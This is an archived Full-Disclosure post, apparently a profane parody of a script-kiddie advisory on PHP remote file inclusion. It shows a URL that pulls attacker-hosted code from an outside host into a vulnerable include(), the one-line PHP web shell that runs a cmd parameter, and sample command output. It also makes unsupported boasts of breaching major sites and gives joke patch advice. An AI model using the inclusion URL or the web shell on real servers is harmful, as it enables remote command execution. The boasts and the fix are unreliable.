lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: frogman at bonbon.net (Frog M@n)
Subject: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!
 PLEASE BE ATTENTIVE !!!

This is IHCTEAM material. We fuck blackhats and we own the planet.
This is a leet advisory, s0 l33t. Just read it and be quiet.

---------------------------

IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr. Frog-m@n !!!!

Product: PHP
Version: all
Security level: Very high baby !!!


What's the fuck about:
======================

There is a BIGBUG in all php versions, in the include() function.
If this function is badly used, a roxor hax0r (like us) can compromise
a box remotely. He can execute commands with apache rights. 

Example:

www.fuck-teso.com/index.php?page=whitehats.php

index.php:
...
include($page); // <--- fucking lame
...

So, you don't know, but there is a BIGBUG. You can include a remote page, that contains
php code, that will be executed on the fuck-teso server:

www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd=ls%20/tmp

It will give you this result:

suckit.tar.gz do_brk.c adore.tar.gz hello_world.c

So, do you understand what I mean ?
What contains we-own-teso.txt ?
just:
<?
system("$cmd");
?>


Patch:
=====

Don't use the include() function, it is coded by idiots, like THEO@...nbsd.
This is so stupid, that we think that this function is maybe a backdoor
from THC.org, the uberh4x0r team very very very leet, that code fucking lame
brute forcers.
Hey guys, you can be hax0red with google, so don't reference your site on google.



Fame:
====

We owned everything and everywhere with this exploit:
www.apache.org
www.debian.org
www.nasa.gov

Is was very funny to read .mil files.

ATTENTION !!!

WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH
PLEASE CONTACT US RIGHT NOW :

karl@...team.org
capashen@...ionet.net
frog-man@...secure.org

---------------------------

We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.

$$$ ??? ??? <--- this is security corps' spirit :)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ